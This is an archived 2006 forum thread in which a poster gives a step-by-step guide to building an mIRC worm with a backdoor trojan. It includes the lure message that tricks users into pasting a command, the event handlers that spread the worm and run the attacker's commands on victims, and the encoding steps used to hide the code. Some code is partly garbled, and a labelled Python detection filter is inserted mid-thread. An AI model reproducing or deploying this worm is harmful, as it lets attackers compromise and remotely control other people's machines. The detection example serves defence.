View Full Version : ***how to infect a backdoor trojan***



abs101
09-01-2006, 07:06 PM
properly developed it becomes a backdoor Trojan. This means that people who are infected by this worm you're able to control them. Once infected with this worm they are also infected with the Trojan. Using the Trojan you can control the victim's PC.
Infect the victim
It all starts with the next command:
//write mab.mrc $decode([base64-encoded script removed],m) | .load -rs mab.mrc
This in one line!
Understand the Script
We need to mix these two things:
The worm
on *:text:*a*:#:{ .ignore $nick | .timer 0 *20 .join #mab | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,*),m) $+ ,m) $chr(*24) .load -rs . $chr(*24) //mode $ $+ me +R }
Here is #mab the channel you want to let them join if they're infected with the worm. But since that would not be very stealth anymore we have to do it in another way. We let it message you. We change the .timer 0 *20 .join #mab with .msg mab_ inf. Where mab_ is your nickname.
With this, your worm has been activated, it will now spread amongst channels throughout the network. It will try to send personal messages to random users while ignoring other people in the process. When this has been a success it will then try to send itself to other users, and then persuade them to type the command.
This is the original worm which I designed. Now we're going to change some functions of the Trojan so that it is constructive. We will remove the user mode +R on the end of the script, because this will only allow users who're authenticated with the official server bot message the victim. Once the Trojan has implemented that is not the objective, so we're going to remove that from the worm. So after these changes we get the next script that we have to merge with the Trojan's script:
on *:text:*a*:#:{ .ignore $nick | .msg mab_ inf | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> $chr(*) $+ 4//write . $ $+ decode( $+ $encode($read($script,n,*),m) $+ ,m) $chr(*24) .load -rs }
The Trojan
on ^*:text:ins*:?:{ . $+ $2- | haltdef }
Combined together they will give us the Backdoored IRC Worm. This means that the worm will happily spread itself, join the specific channel (here: #mab) and then after that it will then spread itself and then wait for you to control it via the Trojan Client. So you will have the rights to do whatever you want to the victim's computer system using mIRC. You actually use the victim's mIRC to accomplish certain commands. So infecting a quakenet operator would be one big plus!
I'm now going to give you more details related to the script so that you can truly understand the full extent of the worm and be able to easily modify it to achieve better results.
So basically we want to mix these two "mechanisms":
on *:text:*a*:#:{ DO SOMETHING }
on ^*:text:ins*:?:{ DO SOMETHING ELSE | haltdef }
Solution:
on ^*:text:*:*: {
if ((ins* iswm $*-) && ($target == $me)) DO SOMETHING
elseif ((a* iswm $*-) && ($chan)) DO SOMETHING ELSE
}
In one line:
on ^*:text:*:*: { if ((ins* iswm $*-) && ($target == $me)) DO SOMETHING | elseif ((a* iswm $*-) && ($chan)) DO SOMETHING ELSE }
Where this is DO SOMETHING the Trojan's work and DO SOMETHING ELSE is also the Worm's work.
Integrated:
on ^*:text:*:*: { if ((ins* iswm $*-) && ($target == $me)) { . $+ $2- | haltdef } | elseif ((a* iswm $*-) && ($chan)) { .msg mab_ inf | .msg $nick Do you want to be OPERATOR in $ $+ chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,*),m) $+ ,m) $chr(*24) .load -rs . $chr(*24) //mode $ $+ me +R } }
Good this is exactly what we needed. Now this doesn’t look very good, so we need to encode it with mIRC. For this we have to write it firstly like something else, some chars have to be written differently because mIRC can misunderstand them and think they are parameters or other things. The next chars have to be written differently: (){},
Why these chars and how can I control it?
Right then, this is exactly what we needed. Now this doesn't look very acceptable at the moment so we need to encode it with mIRC
//echo -a $asc(char here)
If this gives a bad result this means that the char must be written in another way.
Example encoding of “,”:
//say $encode(,,m) This is wrong
//say $encode($+ $chr(44),m) This is correct
Note:
$+ = pasting two strings together
| = $chr(*24)
, = $chr(44)
( = $chr(40)
) = $chr(4*)
{ = $chr(*2*)
} = $chr(*25)
Please be aware that we don't necessarily have to encode that in this way, sometimes this method isn't needed.
For finding the numbers you use this:
//echo -a $asc($?)
This will pop up an input box, just fill in the char and you'll get the number as a result.
Good, we have the knowledge for $encoding now. So this is what we get before we start encoding:
on ^*:text:*:*: $chr(*2*) if ((ins* iswm $ $+ *-) && ($ $+ target == $ $+ me)) $chr(*2*) . $ $+ + $ $+ 2- $chr(*24) haltdef $chr(*25) $chr(*24) elseif ((a* iswm $ $+ *-) && ($chan)) $chr(*2*) .msg mab inf $chr(*24) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(*) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,*),m) $ $+ + ,m) $ $+ chr(*24) .load -rs $chr(*25) $chr(*25)
So:
//say $encode(on ^*:text:*:*: $chr(*2*) if ((ins* iswm $ $+ *-) && ($ $+ target == $ $+ me)) $chr(*2*) . $ $+ + $ $+ 2- $chr(*24) haltdef $chr(*25) $chr(*24) elseif ((a* iswm $ $+ *-) && ($chan)) $chr(*2*) .msg mab inf $chr(*24) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(*) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,*),m) $ $+ + ,m) $ $+ chr(*24) .load -rs $chr(*25) $chr(*25),m)
For finding the $encoded variable we split it up as global variables. The variables are set with
/set %var STRING
So for locating it properly we need to write the next mIRC formula:
//say $encode(%var* $+ %var2 $+ %var* $+ %var4,m)
But we don't necessarily need to set it as variables before we encode it. So you can just use the encode line.
We find the next as result:

[base64-encoded script removed]
This pasted to each other in one line!

WARNING:
DO THESE STEPS CAREFULLY!!!!!!
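
Added example, not part of the original post or thread: a defensive filter for IRC logs or a channel relay bot that flags the lure described above, a message urging readers to paste a `//write ... $decode(...) | .load -rs` command. The log format, nicks, sample lines and the `QUJD` placeholder payload are constructed for illustration.

```python
import re

# mIRC colour (\x03 + optional digits) and formatting codes, often placed
# directly in front of the command to make it stand out in the lure message.
CONTROL = re.compile(r"\x03(?:\d{1,2}(?:,\d{1,2})?)?|[\x02\x0f\x16\x1d\x1f]")
LOG_LINE = re.compile(r"^\[\d\d:\d\d\] <([^>]+)> (.*)$")  # assumed log format

# Indicators drawn from the command pattern quoted in the post.
INDICATORS = {
    "eval_command": re.compile(r"(?<![:/\w])//\s*[a-z]+", re.I),  # '//' = evaluate identifiers
    "write_file": re.compile(r"//?\s*write\b", re.I),
    "decode_call": re.compile(r"\$\s*(?:\$\+\s*)?decode\s*\(", re.I),
    "load_script": re.compile(r"\bload\s+-rs\b", re.I),
    "lure": re.compile(r"copy\s*/?\s*paste", re.I),
}

def classify(message):
    """Return (verdict, matched indicator names) for one chat message."""
    text = CONTROL.sub("", message)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    if "decode_call" in hits and ("write_file" in hits or "load_script" in hits):
        return "block", hits      # decodes hidden text and writes/loads it as a script
    if "decode_call" in hits or ("eval_command" in hits and "lure" in hits):
        return "review", hits     # asks the reader to paste an evaluated command
    return "allow", hits

def scan_log(lines):
    """Return (nick, verdict, hits) for every line that is not allowed."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        verdict, hits = classify(m.group(2))
        if verdict != "allow":
            findings.append((m.group(1), verdict, hits))
    return findings

# Constructed sample log; QUJD is a harmless placeholder, not the post's payload.
SAMPLE_LOG = [
    "[19:06] <alice> anyone know how $decode works? http://example.org/docs",
    "[19:07] <bob> Do you want to be an OPERATOR in #help ? copy/paste this-> "
    "\x034//write . $decode(QUJD,m) | .load -rs .",
    "[19:08] <carol> try //echo -a $asc(,) to see the char code",
    "[19:09] <dave> copy/paste //mode $me +R to stop spam",
]

if __name__ == "__main__":
    for nick, verdict, hits in scan_log(SAMPLE_LOG):
        print(f"{verdict:6} {nick:6} {', '.join(hits)}")
```

Stripping the control codes first matters because the lure puts a colour code directly in front of the command, which would otherwise hide the leading `//` from the match.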

Newby_Programme
09-24-2006, 02:37 AM
I can't read that at all. Get some paragraphs and space it out more so people can read it better. I can't read anything 'cause you got the codes mixed in with the sentences and it's all over the place.

Ezekiel
09-24-2006, 05:00 AM
I can't read that at all. Get some paragraphs and space it out more so people can read it better. I can't read anything 'cause you got the codes mixed in with the sentences and it's all over the place.

Just ignore it - he didn't write any of that.

Newby_Programme
09-24-2006, 05:56 AM
Oh OK, must be why it's all together, 'cause if someone wrote it they most likely would put a space. Copy paste.